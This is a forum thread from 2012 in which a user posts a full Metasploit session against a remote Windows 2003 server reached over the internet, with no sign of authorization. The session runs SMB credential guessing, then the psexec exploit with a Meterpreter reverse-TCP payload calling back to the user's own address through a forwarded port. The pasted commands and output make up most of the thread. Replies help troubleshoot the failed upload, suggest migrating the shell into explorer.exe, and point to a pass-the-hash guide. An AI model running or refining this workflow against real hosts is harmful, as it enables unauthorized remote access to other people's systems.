Jump to content


Photo
- - - - -

Can You Let Me Know What Is The Problem With This Exploit?


  • Please log in to reply
3 replies to this topic

#1 mbarakoda

mbarakoda

    Newbie

  • Members
  • 1 posts

Posted 10 October 2012 - 05:34 PM

Target OS: Windows 2003 SP2 EN
Target public ip : XX.XX.XX.XX
Target Open port: 445
My OS: windows 7
My public ip : YY.YY.YY.YY
my local ip: 192.168.2.42
my router SMC

Due to the fact that the target is not on the same LAN, and the attach will be over the internet, i start with setting port forward from router settings as the following:
Name:AUTH - Protocol:TCP/UDP - WAN Port:4444 - Server Host Port:4444 - Server IP Address 192.168.2.42

I installed metasploit and start with checking if the credentials are valid or not by running scanner/smb/smb_login as following

msf> use scanner/smb/smb_login
msf auxiliary(smb_login) > set rhosts XX.XX.XX.XX
rhosts => XX.XX.XX.XX
msf auxiliary(smb_login) > set smbuser root
smbuser => root
msf auxiliary(smb_login) > set smbpass password
smbpass => password
msf auxiliary(smb_login) > run

[*] XX.XX.XX.XX:445 SMB - Starting SMB login bruteforce
[-] XX.XX.XX.XX - This system allows guest sessions with any credentials, these instances will not be reported.
[-] XX.XX.XX.XX:445 SMB - [1/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : (STATUS_LOGON_FAILURE)
[-] XX.XX.XX.XX:445 SMB - [2/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : root (STATUS_LOGON_FAILURE)
[*] Auth-User: "root"
[+] XX.XX.XX.XX:445|WORKGROUP - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2) 'root' : 'password'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed



then after login successful, i try to use exploit/windows/smb/psexec to exploit the server by the following:



msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost XX.XX.XX.XX
rhost => XX.XX.XX.XX
msf exploit(psexec) > set smbuser root
smbuser => root
msf exploit(psexec) > set smbpass password
smbpass => password
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost YY.YY.YY.YY
lhost => YY.YY.YY.YY
msf exploit(psexec) > set lport 4444
lport => 4444
msf exploit(psexec) > exploit

[-] Handler failed to bind to YY.YY.YY.YY:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Connecting to the server...
[*] Authenticating to XX.XX.XX.XX:445|WORKGROUP as user 'root'...
[*] Uploading payload...
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)



but as you see the exploit failed although the credentials are valid and confirmed above, can you help me understand what's wrong on the above?

#2 Infiltrator

Infiltrator

    Gray-Hat Specialist

  • Active Members
  • PipPipPipPipPipPipPipPipPipPipPipPip
  • 4,392 posts
  • Gender:Male
  • Location:Over the Atlantic, at a cruising altitude of 70.000 feet.
  • Interests:Wireless and Network Security
    Server Virtualization
    Computer Network Infrastructure
    Server implementation.
    General Aviation
    RC Airplanes and Helicopters
    Scuba Diving
    Sky Diving
    War driving
    Solar battery Systems.
    Pen-Testing
    Command & Conquer

Posted 12 October 2012 - 07:49 AM

It could be that the vulnerability is already patched.
Regards,
Infiltrator


Posted Image

Currently studying for my CCE.

#3 digip

digip

    -we're all just neophytes-

  • Active Members
  • PipPipPipPipPipPipPipPipPipPipPipPip
  • 7,653 posts
  • Gender:Male
  • Location:RnVjayBPZmYh 192.168.100.1

Posted 12 October 2012 - 08:52 AM

[-] Handler failed to bind to YY.YY.YY.YY:4444

Whats running locally already on 4444?

Also, what OS is the target? Windows, or Linux runnung SMB? User root on a windows box seems unlikely, where as I could see it on a linux machine running samba, which if you think about it, I don't think psexec works on linux as a payload, but I could be wrong..

If you got a shell popped, try migrating to a process like explorer.exe and then see where or what your commands are/can do.
@xxdigipxx http://www.attack-scanner.com/ | I'm the resident dick around here, or so I am told. Don't take it personally, I just give a shit too much sometimes. respect to all, its the Internet, don't take it to heart.
"Staying quiet doesn't mean I have nothing to say, it means I don't think you're ready to hear my thoughts..."

#4 Infiltrator

Infiltrator

    Gray-Hat Specialist

  • Active Members
  • PipPipPipPipPipPipPipPipPipPipPipPip
  • 4,392 posts
  • Gender:Male
  • Location:Over the Atlantic, at a cruising altitude of 70.000 feet.
  • Interests:Wireless and Network Security
    Server Virtualization
    Computer Network Infrastructure
    Server implementation.
    General Aviation
    RC Airplanes and Helicopters
    Scuba Diving
    Sky Diving
    War driving
    Solar battery Systems.
    Pen-Testing
    Command & Conquer

Posted 15 October 2012 - 10:42 PM

Target OS: Windows 2003 SP2 EN
Target public ip : XX.XX.XX.XX
Target Open port: 445
My OS: windows 7
My public ip : YY.YY.YY.YY
my local ip: 192.168.2.42
my router SMC

Due to the fact that the target is not on the same LAN, and the attach will be over the internet, i start with setting port forward from router settings as the following:
Name:AUTH - Protocol:TCP/UDP - WAN Port:4444 - Server Host Port:4444 - Server IP Address 192.168.2.42

I installed metasploit and start with checking if the credentials are valid or not by running scanner/smb/smb_login as following

msf> use scanner/smb/smb_login
msf auxiliary(smb_login) > set rhosts XX.XX.XX.XX
rhosts => XX.XX.XX.XX
msf auxiliary(smb_login) > set smbuser root
smbuser => root
msf auxiliary(smb_login) > set smbpass password
smbpass => password
msf auxiliary(smb_login) > run

[*] XX.XX.XX.XX:445 SMB - Starting SMB login bruteforce
[-] XX.XX.XX.XX - This system allows guest sessions with any credentials, these instances will not be reported.
[-] XX.XX.XX.XX:445 SMB - [1/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : (STATUS_LOGON_FAILURE)
[-] XX.XX.XX.XX:445 SMB - [2/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : root (STATUS_LOGON_FAILURE)
[*] Auth-User: "root"
[+] XX.XX.XX.XX:445|WORKGROUP - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2) 'root' : 'password'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed



then after login successful, i try to use exploit/windows/smb/psexec to exploit the server by the following:



msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost XX.XX.XX.XX
rhost => XX.XX.XX.XX
msf exploit(psexec) > set smbuser root
smbuser => root
msf exploit(psexec) > set smbpass password
smbpass => password
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost YY.YY.YY.YY
lhost => YY.YY.YY.YY
msf exploit(psexec) > set lport 4444
lport => 4444
msf exploit(psexec) > exploit

[-] Handler failed to bind to YY.YY.YY.YY:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Connecting to the server...
[*] Authenticating to XX.XX.XX.XX:445|WORKGROUP as user 'root'...
[*] Uploading payload...
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)



but as you see the exploit failed although the credentials are valid and confirmed above, can you help me understand what's wrong on the above?


I found something related to your problem, I don't know if you have seen it or not, but here's the URL.

http://www.offensive...c_Pass_The_Hash
Regards,
Infiltrator


Posted Image

Currently studying for my CCE.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users